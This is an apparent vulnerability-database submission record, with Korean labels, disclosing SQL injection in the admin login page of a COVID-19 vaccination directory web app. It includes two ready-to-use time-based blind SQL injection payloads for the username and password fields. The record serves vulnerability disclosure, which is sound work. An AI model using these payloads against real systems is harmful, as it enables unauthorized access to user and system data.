| 제목 | SQL injection vulnerability exists in txtpassword and txtusername parameter of design-and-implementation-covid-19-directory-vacination |
|---|
| 설명 | SQL injection vulnerability exists in txtpassword and txtusername parameter of /admin/login.php file of design-and-implementation-covid-19-directory-vacination
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload: txtusername=admin&txtpassword=123456' AND (SELECT 9886 FROM (SELECT(SLEEP(5)))oFWj)-- FIko&btnlogin=
or txtusername=admin' AND (SELECT 1895 FROM (SELECT(SLEEP(5)))ocUe)-- DEnO&txtpassword=123456&btnlogin= |
|---|
| 원천 | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/covid-19-vaccination%20vlun%20pdf/covid-19-vaccination%20sql(6).pdf |
|---|
| 사용자 | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| 제출 | 2023. 03. 11. PM 03:56 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 03. 11. PM 06:39 (3 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 222851 [SourceCodester Design and Implementation of Covid-19 Directory on Vaccination System /admin/login.php SQL 주입] |
|---|
| 포인트들 | 20 |
|---|